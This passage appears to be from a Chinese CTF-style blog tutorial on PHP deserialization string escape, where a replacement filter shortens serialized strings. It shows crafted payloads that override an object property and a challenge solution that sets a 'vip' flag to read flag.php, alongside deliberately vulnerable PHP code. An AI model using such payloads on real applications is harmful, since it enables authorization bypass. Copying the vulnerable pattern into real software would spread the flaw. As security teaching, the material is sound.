\u5c31\u4f1a\u628a\u6211\u4eec\u7684\u6076\u610f\u4ee3\u7801\u5f53\u4f5c\u5408\u6cd5\u7684\u7ed3\u6784\u53bb\u89e3\u6790$v1\u5403\u6389\u539f\u672c\u7684\u7ed3\u6784\u540e\uff0c\u6211\u4eec\u7d27\u63a5\u7740\u5728$v2\u7684\u5f00\u5934\u6784\u9020\u4e00\u4e2a\u65b0\u7684\u7ed3\u6784\u4ee3\u7801\uff0c\u8986\u76d6\u6389\u539f\u672c\u7684$v2\uff0cPHP\u5c31\u4f1a\u628a\u6211\u4eec\u7684\u6076\u610f\u4ee3\u7801\u5f53\u4f5c\u5408\u6cd5\u7684\u7ed3\u6784\u53bb\u89e3\u6790<\/p>\n\n\n\n<p id=\"ub79009d6\">\u4f8b\u5982\u6211\u4eec\u91cd\u65b0\u5199\u4e00\u4e2a$v2\u7684\u503c<\/p>\n\n\n\n<pre id=\"wAmqb\" class=\"wp-block-code\"><code>;s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<p id=\"u16aa6416\">\u5f00\u5934\u7684 ; \u662f\u4e3a\u4e86\u95ed\u5408 $v1\uff0c\u524d\u9762\u63d0\u5230\u8fc7php\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u5e95\u5c42\u4ee3\u7801\u662f\u4ee5;\u4f5c\u4e3a\u5b57\u6bb5\u7684\u5206\u9694<\/p>\n\n\n\n<p id=\"ub8cb548d\">s:2:&#8221;v2&#8243;;s:6:&#8221;hacked&#8221;; \u662f\u6211\u4eec\u8981\u8986\u76d6\u7684\u65b0\u5c5e\u6027\u548c\u503c<\/p>\n\n\n\n<p id=\"u3d31a261\">} \u95ed\u5408\u6574\u4e2a\u5bf9\u8c61\uff0c\u4e22\u5f03\u540e\u9762\u539f\u672c\u7684\u5783\u573e\u6570\u636e<\/p>\n\n\n\n<p id=\"ubec7a00b\">\u8fd9\u4e2a Payload \u7684\u957f\u5ea6\u662f 24 \u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"ua91cb7c5\">\u5728\u6b63\u5e38\u5e8f\u5217\u5316\u4e2d\uff0c$v1 \u548c $v2 \u4e4b\u95f4\u5939\u7740\u4e00\u6bb5\u56fa\u5b9a\u7684\u7ed3\u6784\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre id=\"MIoT4\" class=\"wp-block-code\"><code>...s:N:\"&#91;v1\u7684\u5185\u5bb9]\"; s:2:\"v2\";s:XX:\" &#91;v2\u7684\u5185\u5bb9]...<\/code><\/pre>\n\n\n\n<p id=\"uc7aed6cf\">\u6211\u4eec\u8981\u8ba9 $v1 \u5403\u6389\u7684\u90e8\u5206\u5c31\u662f\u8fd9\u6bb5\uff1a &#8220;;s:2:&#8221;v2&#8243;;s:XX:&#8221;<\/p>\n\n\n\n<p id=\"uf29c946a\">\u56e0\u4e3a\u6211\u4eec\u7684v2 payload\u957f\u5ea6\u662f24\u4e2a\u5b57\u7b26\u6240\u4ee5\u4e2d\u95f4\u8fd9\u4e00\u6bb5\u5c31\u662f &#8220;;s:2:&#8221;v2&#8243;;s:24:&#8221;<\/p>\n\n\n\n<p id=\"u03c2bbcb\">\u6570\u4e00\u6570\u957f\u5ea6\uff1a&#8221;;s:2:&#8221;v2&#8243;;s:24:&#8221; \u5171\u6709 16 \u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"u06e5b396\">\u6211\u4eec\u6765\u770b\u5230\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<pre id=\"HXDWs\" class=\"wp-block-code\"><code>$data = str_replace(\"system()\",\"\",$data);<\/code><\/pre>\n\n\n\n<p id=\"u3bfd3bc0\">system()\u4e00\u5171\u662f\u516b\u4e2a\u5b57\u7b26\uff0c\u88ab\u66ff\u6362\u4e3a\u7a7a\uff0c\u4e5f\u5c31\u662f\u8bf4\u4e00\u4e2asystem()\u4f1a\u5403\u6389\u516b\u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"u5e93a598\">\u6211\u4eec\u9700\u8981\u4e24\u4e2asystem()<\/p>\n\n\n\n<p id=\"u7db01acf\">\u6784\u9020payload<\/p>\n\n\n\n<pre id=\"TtSLW\" class=\"wp-block-code\"><code>$a = 'system()system()';\n$b = ';s:2:\"v2\";s:6:\"hacked\";}';<\/code><\/pre>\n\n\n\n<p id=\"u4fad40fb\">\u6211\u4eec\u8c03\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"171\" data-attachment-id=\"90\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=90\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60.png\" data-orig-size=\"1830,305\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-300x50.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-60-1024x171.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-90\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u90be4316\">\u521a\u521a\u4f20\u5165\u7684\u65f6\u5019\uff0cdata\u7684\u503c\u662f<\/p>\n\n\n\n<pre id=\"jNUe4\" class=\"wp-block-code\"><code>O:1:\"A\":2:{s:2:\"v1\";s:16:\"system()system()\";s:2:\"v2\";s:24:\";s:2:\"v2\";s:6:\"hacked\";}\";}<\/code><\/pre>\n\n\n\n<p id=\"u13975588\">\u7ee7\u7eed\u6b65\u5165<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"475\" data-attachment-id=\"91\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=91\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61.png\" data-orig-size=\"1878,871\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-300x139.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-61-1024x475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-91\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u60611db4\">\u8fd9\u4e2a\u65f6\u5019system()\u5df2\u7ecf\u88ab\u66ff\u6362\u4e3a\u7a7a\u4e86\uff0cdata\u7684\u503c\u662f<\/p>\n\n\n\n<pre id=\"lNMWL\" class=\"wp-block-code\"><code>O:1:\"A\":2:{s:2:\"v1\";s:16:\"\";s:2:\"v2\";s:24:\";s:2:\"v2\";s:6:\"hacked\";}\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"81\" data-attachment-id=\"92\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=92\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62.png\" data-orig-size=\"1079,85\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-300x24.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-62-1024x81.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-92\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u44e97f15\">system()\u6ca1\u4e86\uff0cs:16\u4f1a\u7ee7\u7eed\u5f80\u540e\u540316\u4e2a\u5b57\u7b26\uff0c\u4e4b\u524d\u7684v2\u5c31\u88ab\u5403\u70b9\u4f5c\u4e3av1\u7684\u503c\u4e86<\/p>\n\n\n\n<p id=\"u4c310b76\">\u6267\u884c\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"483\" height=\"190\" data-attachment-id=\"93\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=93\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" data-orig-size=\"483,190\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63-300x118.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-63.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-93\"  sizes=\"auto, (max-width: 483px) 100vw, 483px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ucc7fb1f9\">\u53ef\u4ee5\u770b\u5230$v2\u7684\u503c\u5df2\u7ecf\u88ab\u66ff\u6362\u6210\u4e86\u6211\u4eec\u60f3\u8981\u7684\u503c<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"c7ILm\">\u4f8b\u9898<\/h5>\n\n\n\n<p id=\"u830708a6\">\u6211\u4eec\u6765\u770b\u4e00\u9053\u4f8b\u9898<\/p>\n\n\n\n<pre id=\"HRpEA\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nerror_reporting(0);\nfunction filter($name){\n    $safe=array(\"flag\",\"php\");\n    $name=str_replace($safe,\"hk\",$name);\n    return $name;\n}\nclass test{\n    var $user;\n    var $pass;\n    var $vip = false ;\n    function __construct($user,$pass){\n        $this-&gt;user=$user;\n    $this-&gt;pass=$pass;\n    }\n}\n$param=$_GET&#91;'user'];\n$pass=$_GET&#91;'pass'];\n$param=serialize(new test($param,$pass));\n$profile=unserialize(filter($param));\n\nif ($profile-&gt;vip){\n    echo file_get_contents(\"flag.php\");\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u16128dcf\">\u8fd9\u9053\u9898\u4f1a\u5c06user\u548cpass\u4e2d\u7684php\u8fd8\u6709flag\u66ff\u6362\u6210hk\uff0c\u5bf9\u4e8ephp\u800c\u8a00\u51cf\u5c11\u4e86\u4e00\u4e2a\u5b57\u7b26\uff0c\u5bf9\u4e8eflag\u800c\u8a00\u51cf\u5c11\u4e86\u4e24\u4e2a\u5b57\u7b26<\/p>\n\n\n\n<p id=\"ud9a4ac16\">\u6211\u4eec\u9700\u8981\u8ba9 $profile-&gt;vip \u4e3a true\uff0c\u4f46\u662f\u7c7b\u5b9a\u4e49\u4e2d $vip \u9ed8\u8ba4\u4e3a false\uff0c\u4e14\u6784\u9020\u51fd\u6570\u53ea\u5141\u8bb8\u6211\u4eec\u8d4b\u503c $user \u548c $pass<\/p>\n\n\n\n<p id=\"u93e1f9c6\">\u90a3\u4e48\u6211\u4eec\u9700\u8981\u6784\u9020\u4e00\u6bb5\u4ee3\u7801\uff0c\u8fd9\u6bb5\u4ee3\u7801\u5728\u88ab\u89e3\u6790\u65f6\uff0c\u4f1a\u5c06 vip \u8bbe\u4e3a true\u3002 \u56e0\u4e3a\u6211\u4eec\u6253\u7b97\u8ba9 $user \u5403\u6389\u4e2d\u95f4\u7684\u95f4\u9694\uff0c\u6240\u4ee5 $pass \u7684\u5f00\u5934\u5fc5\u987b\u914d\u5408\u95ed\u5408<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"476\" data-attachment-id=\"94\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=94\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64.png\" data-orig-size=\"1528,710\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-300x139.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-64-1024x476.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-94\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u86d57dfe\">\u5148\u5927\u81f4\u770b\u4e00\u773c\u8fd9\u9053\u9898\u7684\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u76ddd71f\">\u6211\u4eec\u8981\u5403\u6389\u7684\u90e8\u5206\u662f\uff1a&#8221;;s:4:&#8221;pass&#8221;;s:19:&#8221; 19\u4e2a\u5b57\u7b26\u4e5f\u5c31\u662f19\u4e2aphp<\/p>\n\n\n\n<p id=\"ufaec95d2\">\u8f93\u51faflag\u7684\u6761\u4ef6$profile-&gt;vip<\/p>\n\n\n\n<p id=\"u9a246b63\">\u53ef\u4ee5\u6784\u9020payload<\/p>\n\n\n\n<pre id=\"upJfw\" class=\"wp-block-code\"><code>\";s:3:\"vip\";b:1;s:4:\"pass\";s:3:\"666\";}<\/code><\/pre>\n\n\n\n<p id=\"u1eb1040c\">\u8fd9\u91cc\u8865\u5145\u4e86\u4e00\u4e2as:4\u662f\u56e0\u4e3a\u5e8f\u5217\u5316\u5934\u662f\u8fd9\u6837\u751f\u6210\u7684:O:4:&#8221;test&#8221;:3:{&#8230;} \u8fd9\u91cc\u7684:3: \u662f\u4e00\u4e2a\u6b7b\u547d\u4ee4\uff0c\u610f\u5473\u7740&#8221;\u5728\u8fd9\u4e2a\u5927\u62ec\u53f7 {} \u91cc,\u5fc5\u987b\u5305\u542b3\u4e2a\u5c5e\u6027\u201c<\/p>\n\n\n\n<p id=\"u6d685b07\">\u4f20\u5165\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"415\" data-attachment-id=\"95\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=95\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65.png\" data-orig-size=\"1880,761\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-300x121.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-65-1024x415.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-95\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7e064e61\">\u5b57\u7b26\u88ab\u66ff\u6362\u6389\u4ee5\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" data-attachment-id=\"96\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=96\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66.png\" data-orig-size=\"1914,833\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-300x131.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-66-1024x446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-96\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc31c3ecc\">vip\u72b6\u6001<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" data-attachment-id=\"97\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=97\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67.png\" data-orig-size=\"1919,955\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-300x149.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-67-1024x510.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-97\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf94d13b6\">\u6210\u529f\u6267\u884cif ($profile-&gt;vip){\u540e\u9762\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"98\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=98\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 